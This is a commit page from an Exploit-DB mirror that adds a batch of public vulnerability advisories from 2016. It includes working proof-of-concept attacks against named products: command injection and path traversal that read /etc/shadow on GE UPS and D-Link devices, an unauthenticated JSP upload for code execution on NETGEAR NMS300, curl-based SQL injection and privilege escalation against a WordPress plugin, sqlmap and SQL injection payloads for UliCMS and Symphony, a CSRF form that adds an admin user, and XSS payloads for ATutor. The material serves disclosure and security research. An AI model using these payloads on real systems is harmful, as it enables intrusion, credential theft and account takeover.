bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-02-05

Browse source 
10 new exploits
This commit is contained in:
Offensive Security 2016-02-05 05:02:27 +00:00
parent 1221dcb78e
commit 363cbde9cc
11 changed files with 878 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
files.csv
View file

@ -35644,6 +35644,16 @@ id,file,description,date,author,platform,type,port
39402,platforms/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",jsp,webapps,80 39402,platforms/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",jsp,webapps,80
39403,platforms/windows/dos/39403.py,"Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow Vulnerability",2016-02-03,LiquidWorm,windows,dos,0 39403,platforms/windows/dos/39403.py,"Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow Vulnerability",2016-02-03,LiquidWorm,windows,dos,0
39404,platforms/php/webapps/39404.txt,"Timeclock Software 0.995 - Multiple SQL Iinjection Vulnerabilities",2016-02-03,Benetrix,php,webapps,80 39404,platforms/php/webapps/39404.txt,"Timeclock Software 0.995 - Multiple SQL Iinjection Vulnerabilities",2016-02-03,Benetrix,php,webapps,80
39405,platforms/jsp/webapps/39405.py,"Jive Forums <= 5.5.25 - Directory Traversal Vulnerability",2016-02-03,"Zhaohuan of Tencent Security",jsp,webapps,80 39405,platforms/jsp/webapps/39405.py,"Jive Forums <= 5.5.25 - Directory Traversal Vulnerability",2016-02-03,ZhaoHuAn,jsp,webapps,80
39406,platforms/linux/dos/39406.py,"yTree 1.94-1.1 - Local Buffer Overflow",2016-02-03,"Juan Sacco",linux,dos,0 39406,platforms/linux/dos/39406.py,"yTree 1.94-1.1 - Local Buffer Overflow",2016-02-03,"Juan Sacco",linux,dos,0
39407,platforms/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Stored XSS Vulnerabilities",2016-02-03,Portcullis,hardware,webapps,0 39407,platforms/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Stored XSS Vulnerabilities",2016-02-03,Portcullis,hardware,webapps,0
39408,platforms/hardware/webapps/39408.txt,"GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps,0
39409,platforms/hardware/webapps/39409.txt,"DLink DVG­N5402SP - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps,0
39410,platforms/php/webapps/39410.txt,"WordPress User Meta Manager Plugin 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",php,webapps,80
39411,platforms/php/webapps/39411.txt,"WordPress User Meta Manager Plugin 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",php,webapps,80
39412,platforms/hardware/webapps/39412.txt,"NETGEAR ProSafe Network Management System NMS300 - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",hardware,webapps,0
39413,platforms/php/webapps/39413.txt,"UliCMS <= v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",php,webapps,80
39414,platforms/php/webapps/39414.txt,"OpenDocMan 1.3.4 - CSRF Vulnerability",2016-02-04,"Curesec Research Team",php,webapps,80
39415,platforms/php/webapps/39415.txt,"ATutor 2.2 - Multiple XSS Vulnerabilities",2016-02-04,"Curesec Research Team",php,webapps,80
39416,platforms/php/webapps/39416.txt,"Symphony CMS 2.6.3 Multiple SQL Injection Vulnerabilities",2016-02-04,"Sachin Wagh",php,webapps,80
39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0

Can't render this file because it is too large.

72
platforms/hardware/webapps/39408.txt Executable file
View file

@ -0,0 +1,72 @@
# Exploit Title: [GE Industrial Solutions - UPS SNMP Adapter Command
Injection and Clear-text Storage of Sensitive Information Vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [http://www.geindustrial.com/]
# Versions Reported: [All SNMP/Web Interface cards with firmware version
prior to 4.8 manufactured by GE Industrial Solutions.]
# CVE-IDs: [CVE-2016-0861 + CVE-2016-0862]
*GE Advisory: *
http://apps.geindustrial.com/publibrary/checkout/GEIS_SNMP?TNR=Application%20and%20Technical|GEIS_SNMP|PDF&filename=GEIS_SNMP.pdf
*ICS-CERT Advisory:*https://ics-cert.us-cert.gov/advisories/ICSA-16-033-02
*About GE*
GE is a US-based company that maintains offices in several countries around
the world.
The affected product, SNMP/Web Interface adapter, is a web server designed
to present information about the Uninterruptible Power Supply (UPS).
According to GE, the SNMP/Web Interface is deployed across several sectors
including Critical Manufacturing and Energy. GE estimates that these
products are used worldwide.
*Affected Products*
• All SNMP/Web Interface cards with firmware version prior to 4.8
manufactured by GE Industrial Solutions.
*VULNERABILITY OVERVIEW*
A
*COMMAND INJECTIONCVE-2016-0861*
Device application services run as (root) privileged user, and does not
perform strict input validation. This allows an authenticated user to
execute any system commands on the system.
Vulnerable function:
http://IP/dig.asp <http://ip/dig.asp>
Vulnerable parameter:
Hostname/IP address
*PoC:*
In the Hostname/IP address input, enter:
; cat /etc/shadow
Output
root:<hash>:0:0:root:/root:/bin/sh
<...other system users...>
ge:<hash>:101:0:gedeups7:/home/admin:/bin/sh
root123:<hash>:102:0:gedeups2:/home/admin:/bin/sh
B
*CLEARTEXT STORAGE OF SENSITIVE INFORMATIONCVE-2016-0862*
File contains sensitive account information stored in cleartext. All users,
including non-admins, can view/access device's configuration, via Menu
option -> Save -> Settings.
The application stores all information in clear-text, including *all user
logins and clear-text passwords*.
--
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in

95
platforms/hardware/webapps/39409.txt Executable file
View file

@ -0,0 +1,95 @@
# Exploit Title: [DLink DVG­N5402SP Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.dlink.com/]
# Versions Reported: [Multiple - See below]
# CVE-IDs: [CVE-2015-7245 + CVE-2015-7246 + CVE-2015-7247]
*DLink DVG­N5402SP File Path Traversal, Weak Credentials Management, and
Sensitive Info Leakage Vulnerabilities*
*Vulnerable Models, Firmware, Hardware versions*
DVG­N5402SP Web Management
Model Name : GPN2.4P21­C­CN
Firmware Version : W1000CN­00
Firmware Version :W1000CN­03
Firmware Version :W2000EN­00
Hardware Platform :ZS
Hardware Version :Gpn2.4P21­C_WIFI­V0.05
Device can be managed through three users:
1. super ­ full privileges
2. admin ­ full privileges
3. support ­ restricted user
*1. Path traversal*
Arbitrary files can be read off of the device file system. No
authentication is required to exploit this vulnerability.
*CVE-ID*: CVE-2015-7245
*HTTP Request *
POST /cgi­bin/webproc HTTP/1.1
Host: <IP>:8080
User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101
Firefox/39.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept­Language: en­US,en;q=0.5
Accept­Encoding: gzip, deflate
Referer: http://<IP>:8080/cgi­bin/webproc
Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super
Connection: keep­alive
Content­Type: application/x­www­form­urlencoded
Content­Length: 223
getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var%
&obj­action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
*HTTP Response*
HTTP/1.0 200 OK
pstVal­>name:getpage; pstVal­>value:html/main.html
pstVal­>name:getpage; pstVal­>value:html/index.html
pstVal­>name:errorpage;
pstVal­>value:../../../../../../../../../../../etc/shadow
pstVal­>name:var:menu; pstVal­>value:setup
pstVal­>name:var:page; pstVal­>value:connected
pstVal­>name:var:subpage; pstVal­>value:­
pstVal­>name:obj­action; pstVal­>value:auth
pstVal­>name::username; pstVal­>value:super
pstVal­>name::password; pstVal­>value:super
pstVal­>name::action; pstVal­>value:login
pstVal­>name::sessionid; pstVal­>value:1ac5da6b
Connection: close
Content­type: text/html
Pragma: no­cache
Cache­Control: no­cache
set­cookie: sessionid=1ac5da6b; expires=Fri, 31­Dec­9999 23:59:59 GMT;
path=/
#root:<hash_redacted>:13796:0:99999:7:::
root:<hash_redacted>:13796:0:99999:7:::
#tw:<hash_redacted>:13796:0:99999:7:::
#tw:<hash_redacted>:13796:0:99999:7:::
*2. Use of Default, Hard­Coded Credentials**CVE-ID*: CVE-2015-7246
The device has two system user accounts configured with default passwords
(root:root, tw:tw).
Login ­ tw ­ is not active though. Anyone could use the default password to
gain administrative control through the Telnet service of the system (when
enabled) leading to integrity, loss of confidentiality, or loss of
availability.
*3.Sensitive info leakage via device running configuration backup *
*CVE-ID*: CVE-2015-7247
Usernames, Passwords, keys, values and web account hashes (super & admin)
are stored in clear­text and not masked. It is noted that restricted
'support' user may also access this config backup file from the portal
directly, gather clear-text admin creds, and gain full, unauthorized access
to the device.
--
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in

106
platforms/hardware/webapps/39412.txt Executable file
View file

@ -0,0 +1,106 @@
>> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 04/02/2016 / Last updated: 04/02/2016
>> Background on the affected product:
"NMS300
ProSAFE® Network Management System
Diagnose, control, and optimize your network devices.
The NETGEAR Management System NMS300 delivers insight into network elements, including third-party devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network."
>> Summary:
Netgear's NMS300 is a network management utility that runs on Windows systems. It has serious two vulnerabilities that can be exploited by a remote attacker. The first one is an arbitrary file upload vulnerability that allows an unauthenticated attacker to execute Java code as the SYSTEM user.
The second vulnerability is an arbitrary file download that allows an authenticated user to download any file from the host that is running NMS300.
A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released.
>> Technical details:
#1
Vulnerability: Remote code execution via arbitrary file upload (unauthenticated)
CVE-2016-1525
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13
There are two servlets that allow unauthenticated file uploads:
@RequestMapping({ "/fileUpload.do" })
public class FileUpload2Controller
- Uses spring file upload
@RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" })
public class FileUploadController
- Uses flash upload
The JSP file can be uploaded as shown below, it will be named null[name].[extension] and can be reached on http://[host]:8080/null[name].[extension].
So for example if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user.
POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1
Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="name"
[name]
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="Filedata"; filename="whatever.[extension]"
Content-Type: application/octet-stream
<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
pageEncoding="ISO-8859-1"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Hello World Example</title>
</head>
<body>
<h2>A Hello World Example of JSP.</h2>
</body>
</html>
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--
#2
Vulnerability: Arbitrary file download (authenticated)
CVE-2016-1524
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13
Three steps need to be taken in order to exploit this vulnerability:
a) Add a configuration image, with the realName parameter containing the path traversal to the target file:
POST /data/config/image.do?method=add HTTP/1.1
realName=../../../../../../../../../../<file on C:\>&md5=&fileName=<imagename.img>&version=1337&vendor=Netgear&deviceType=4&deviceModel=FS526Tv2&description=bla
b) Obtain the file identifier (imageId) for the image that was created by scraping the page below for "imagename.img" (the fileName parameter in step 1):
POST /data/getPage.do?method=getPageList&type=configImgManager
everyPage=10000
Sample response:
{"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015 21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"}
c) Download the file with the imageId obtained in step 2:
GET /data/config/image.do?method=export&imageId=<ID>
>> Fix:
No fix is currently available. It is recommended not to expose NMS300 to the Internet or any unstrusted networks.
>> References:
[1] https://www.kb.cert.org/vuls/id/777024
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

42
platforms/php/webapps/39410.txt Executable file
View file

@ -0,0 +1,42 @@
* Exploit Title: WordPress User Meta Manager Plugin [Blind SQLI]
* Discovery Date: 2015/12/28
* Public Disclosure Date: 2016/02/04
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://jasonlau.biz/home/
* Software Link: https://wordpress.org/plugins/user-meta-manager/
* Version: 3.4.6
* Tested on: WordPress 4.4.1
* Category: webapps
Description
================================================================================
AJAX actions `umm_edit_user_meta` and `umm_delete_user_meta` of the User Meta
Manager for WordPress plugin up to v3.4.6 are vulnerable to blind SQL injection
attacks. A registered user can pass arbitrary MySQL commands to `umm_user` GET
param.
PoC
================================================================================
curl -c ${USER_COOKIES} \
"http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
&umm_sub_action=[umm_delete_user_meta|umm_edit_user_meta]&umm_user=SLEEP(5)"
Timeline
================================================================================
2015/12/28 - Discovered
2015/12/29 - Vendor notified via support forums in WordPress.org
2015/12/29 - Vendor notified via contact form in his site
2016/01/29 - WordPress security team notified about the issue
2016/02/02 - Vendor released version 3.4.7
2016/02/02 - Verified that this exploit no longer applies in version 3.4.7
Solution
================================================================================
Update to version 3.4.7

44
platforms/php/webapps/39411.txt Executable file
View file

@ -0,0 +1,44 @@
* Exploit Title: WordPress User Meta Manager Plugin [Privilege Escalation]
* Discovery Date: 2015/12/28
* Public Disclosure Date: 2016/02/04
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://jasonlau.biz/home/
* Software Link: https://wordpress.org/plugins/user-meta-manager/
* Version: 3.4.6
* Tested on: WordPress 4.4.1
* Category: webapps
Description
================================================================================
User Meta Manager for WordPress plugin up to v3.4.6 suffers from a privilege
escalation vulnerability. A registered user can modify the meta information of
any registered user, including himself. This way he can modify `wp_capabilities`
meta to escalate his account to a full privileged administrative account.
PoC
================================================================================
curl -c ${USER_COOKIES} \
-d "mode=edit&umm_meta_value[]=a:1:{s:13:\"administrator\";b:1;}\
&umm_meta_key[]=wp_capabilities" \
"http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
&umm_sub_action=umm_update_user_meta&umm_user=${USER_ID}"
Timeline
================================================================================
2015/12/28 - Discovered
2015/12/29 - Vendor notified via support forums in WordPress.org
2015/12/29 - Vendor notified via contact form in his site
2016/01/29 - WordPress security team notified about the issue
2016/02/02 - Vendor released version 3.4.7
2016/02/02 - Verified that this exploit no longer applies in version 3.4.7
Solution
================================================================================
No official solution yet exists.

87
platforms/php/webapps/39413.txt Executable file
View file

@ -0,0 +1,87 @@
=============================================
MGC ALERT 2016-001
- Original release date: January 26, 2016
- Last revised: February 02, 2016
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
I. VULNERABILITY
-------------------------
Time-based SQL Injection in Admin panel UliCMS <= v9.8.1
II. BACKGROUND
-------------------------
UliCMS is a modern web content management solution from Germany, that
attempts to make web content management more easier.
III. DESCRIPTION
-------------------------
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.
It is possible to inject SQL code in the variable "country_blacklist" on
the page "action=spam_filter".
IV. PROOF OF CONCEPT
-------------------------
The following URL's and parameters have been confirmed to all suffer from
Time Based Blind SQL injection.
/ulicms/admin/?action=spam_filter
(POST)
spamfilter_enabled=yes&spamfilter_words_blacklist=a&country_blacklist=ru&submit_spamfilter_settings=Save+Changes
POC using SQLMap:
sqlmap -u "http://127.0.0.1/ulicms/admin/?action=spam_filter" --cookie="SET
COOKIE HERE"
--data="spamfilter_enabled=yes&spamfilter_words_blacklist=a&country_blacklist=ru&submit_spamfilter_settings=Save+Changes"
-p "country_blacklist" --dbms="mysql" --dbs
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-------------------------
UliCMS <= v9.8.1
VII. SOLUTION
-------------------------
Install vendor patch.
VIII. REFERENCES
-------------------------
http://en.ulicms.de/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
January 26, 2016 1: Initial release
February 02, 2015 2: Revision to send to lists
XI. DISCLOSURE TIMELINE
-------------------------
January 26, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
January 26, 2016 2: Send to vendor
January 28, 2016 3: Vendor fix vulnerability
February 02, 2016 4: Send to the Full-Disclosure lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

82
platforms/php/webapps/39414.txt Executable file
View file

@ -0,0 +1,82 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Opendocman 1.3.4
Fixed in: 1.3.5
Fixed Version Link: http://www.opendocman.com/free-download/
Vendor Website: http://www.opendocman.com/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 02/01/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
CVSS
Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P
Description
Opendocman does not have CSRF protection, which means that an attacker can
perform actions for an admin, if the admin visits an attacker controlled
website while logged in.
3. Proof of Concept
Add new Admin User:
<html>
<body>
<form action="http://localhost/opendocman-1.3.4/user.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="last&#95;name" value="test" />
<input type="hidden" name="first&#95;name" value="test" />
<input type="hidden" name="username" value="test" />
<input type="hidden" name="phonenumber" value="1214532" />
<input type="hidden" name="password" value="12345678" />
<input type="hidden" name="Email" value="test&#64;example&#46;com" />
<input type="hidden" name="department" value="1" />
<input type="hidden" name="admin" value="1" />
<input type="hidden" name="can&#95;add" value="1" />
<input type="hidden" name="can&#95;checkin" value="1" />
<input type="hidden" name="submit" value="Add&#32;User" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
4. Solution
To mitigate this issue please upgrade at least to version 1.3.5:
http://www.opendocman.com/free-download/
Please note that a newer version might already be available.
5. Report Timeline
11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of disclosure date
12/19/2015 Vendor sends fix for CSRF for verification
01/13/2016 Confirmed CSRF fix
01/20/2016 Vendor requests more time to fix other issues in same version
01/31/2016 Vendor releases fix
02/01/2015 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/Opendocman-134-CSRF-150.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

164
platforms/php/webapps/39415.txt Executable file
View file

@ -0,0 +1,164 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Atutor 2.2
Fixed in: partly in ATutor 2.2.1-RC1, complete in 2.2.1
Fixed Version Link: http://www.atutor.ca/atutor/download.php
Vendor Website: http://www.atutor.ca/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 02/01/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Atutor is a learning management system (LMS) written in PHP. In version 2.2, it
is vulnerable to multiple reflected and persistent XSS attacks.
The vulnerabilities can lead to the stealing of cookies, injection of
keyloggers, or the bypassing of CSRF protection. If the victim is an admin, a
successful exploitation can lead to code execution via the theme uploader, and
if the victim is an instructor, this can lead to code execution via a file
upload vulnerability in the same version of Atutor.
3. Details
XSS 1: Reflected XSS - Calendar
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description: The calendar_next parameter of the calendar is vulnerable to XSS.
This issue has been fixed in ATutor 2.2.1-RC1.
Proof of Concept:
http://localhost/ATutor/mods/_standard/calendar/getlanguage.php?token=calendar_next<script>alert(1)<%2fscript>&pub=1
Code:
/mods/_standard/calendar/getlanguage.php
$token = $_GET['token'];
echo _AT($token);
XSS 2: Persistent XSS - Profile
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: When saving profile information, < is filtered out. < on the
other hand is not filtered, but converted to <, which leads to persistent XSS.
A user account is needed, but registration is open by default. This issue has
been fixed in ATutor 2.2.1.
Proof of Concept:
Visit:
http://localhost/ATutor/users/profile.php
In any field, enter
<img src=no onerror=alert(1)>
The input is for example echoed when visiting http://localhost/ATutor/users/
profile.php. This self-XSS may be exploited by force-logging in the victim.
The input is not only echoed to the user themselves, but also in other places.
For example, an attacker could send a private message to a victim. When the
victim views the message, or visits their inbox, the injected code will be
executed.
XSS 3: Persistent XSS - Forum
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: When creating a forum post, the Subject parameter is vulnerable to
persistent XSS.
A user account is needed, but registration is open by default. This issue has
been fixed in ATutor 2.2.1.
Proof of Concept:
Visit a forum, eg here:
http://localhost/ATutor/mods/_standard/forums/forum/view.php?fid=1&pid=1
Post a new message, as Subject, use:
Re: test topic'"><img src=no onerror=alert(1)>
In ATutor 2.2.1-RC1, < and > are encoded, preventing the proof of concept from
working. But until version 2.2.1, it was still possible to exploit this issue
either by using the JavaScript context the input is echoed into (onClick), or
by adding a new attribute:
adding new attributes:
Re: ';" onmouseover="alert(1); var foo='
staying inside the existing JavaScript context:
Re: test topic';alert(1);var foo='
XSS 4: Persistent self-XSS - Calendar
CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N
Description: The event name of the calendar is vulnerable to persistent XSS.
The calendar seems to be shown only to the user creating it, meaning the only
way to exploit this issue would be to force-login the victim.
A user account is needed, but registration is open by default. This issue has
been fixed in ATutor 2.2.1-RC1.
Proof of Concept:
Visit: http://localhost/ATutor/mods/_standard/calendar/index_mystart.php
Create event with name:
'"><img src=no onerror=alert(1)>
Visit event page: http://localhost/ATutor/mods/_standard/calendar/index_mystart.php
XSS 5: Persistent XSS - Chat
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: When viewing the chat history, chat messages are not properly HTML
encoded, leading to persistent XSS.
A user account is needed, but registration is open by default. This issue has
been fixed in ATutor 2.2.1-RC1.
Proof of Concept:
1. Visit Chat:
http://localhost/ATutor/mods/_standard/chat/chat.php
2. Enter chat message:
'"><img src=no onerror=alert(1)>
3. Visit chat history of that user:
http://localhost/ATutor/mods/_standard/chat/filterHistory.php?filterChatID=[USERNAME]
4. Solution
To mitigate this issue please upgrade at least to version 2.2.1:
http://www.atutor.ca/atutor/download.php
Please note that a newer version might already be available.
5. Report Timeline
11/17/2015 Informed Vendor about Issue
11/21/2015 Vendor requests more time
01/06/2016 Vendor releases new release candidate with partial fix
01/30/2016 Vendor releases complete fix
02/01/2016 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/Atutor-22-XSS-149.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

131
platforms/php/webapps/39416.txt Executable file
View file

@ -0,0 +1,131 @@
================================================================
Symphony CMS 2.6.3 Multiple SQL Injection Vulnerabilities
================================================================
Information
================================================================
Vulnerability Type : Multiple SQL Injection Vulnerabilities
Vendor Homepage: http://www.getsymphony.com/
Vulnerable Version:Symphony CMS 2.6.3
Fixed Version :Symphony CMS 2.6.5
Severity: High
Author Sachin Wagh (@tiger_tigerboy)
Description
================================================================
The vulnerability is located in the 'fields[username]','action[save]' and
'fields[email]' of the '/symphony/system/authors/new/' page.
Proof of Concept
================================================================
*1. fields[username] (POST)*
Parameter: fields[username] (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-6697'
OR 7462=7462#&fields[user_type]=author&fields[password]=sach
in&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-8105'
OR 1 GROUP BY CONCAT(0x71767a7871,(SELECT (CASE WHEN (1004=1
004) THEN 1 ELSE 0 END)),0x716b7a6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_a
rea]=3&action[save]=Create Author
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=sachin123'
OR SLEEP(5)#&fields[user_type]=author&fields[password]=s
achin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author
---
[14:09:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.12, PHP 5.5.27
back-end DBMS: MySQL 5.0.12
*2. fields[email] (POST)*
Parameter: fields[email] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
sachin12@mail.com' AND 4852=4852 AND
'dqXl'='dqXl&fields[username]=sachinnn123&fields[user
type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
sachin12@mail.com' AND (SELECT 8298 FROM(SELECT
COUNT(*),CONCAT(0x71767a7871,(SELECT (ELT(
298=8298,1))),0x716b7a6271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'Pmvq'='Pmvq&fields[username]=sachinnn123&fields[user_type]=author&fields[password]=sachin&fields[
assword-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
sachin12@mail.com' AND (SELECT * FROM (SELECT(SLEEP(5)))xIxY) AND
'hKvH'='hKvH&fields[user
ame]=sachinnn123&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author
*3. action[save] (POST)*
Parameter: action[save] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
sachin12@mail.com
&fields[username]=sachinnn123&fields[user_type]=author&fields[password]=sa
chin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author%' AND 8836=8836 AND '%'='
---
[12:23:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.12, PHP 5.5.27
back-end DBMS: MySQL 5.0
================================================================
Vulnerable Product:
[+]
Symphony CMS 2.6.3
Vulnerable Parameter(s):
[+]fields[username] (POST)
[+]fields[email] (POST)
[+]action[save] (POST)
Affected Area(s):
[+]
http://localhost/symphony2.6.3/symphony-2.6.3/symphony/system/authors/new/
================================================================
Disclosure Timeline:
Vendor notification: Jan 29, 2016
Public disclosure: Jan 30, 2016
Credits & Authors
================================================================
Sachin Wagh (@tiger_tigerboy)
-- Best Regards, *Sachin Wagh*

44
platforms/windows/local/39417.py Executable file
View file

@ -0,0 +1,44 @@
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
#[+] Exploit Title: FTPShell Client (Add New Folder) Local Buffer Overflow
#[+] Date: 2/2/2016
#[+]Exploit Author: Arash Khazaei
#[+] Vendor Homepage: www.ftpshell.com
#[+]Software Link: http://www.ftpshell.com/download.htm
#[+] Version: 5.24
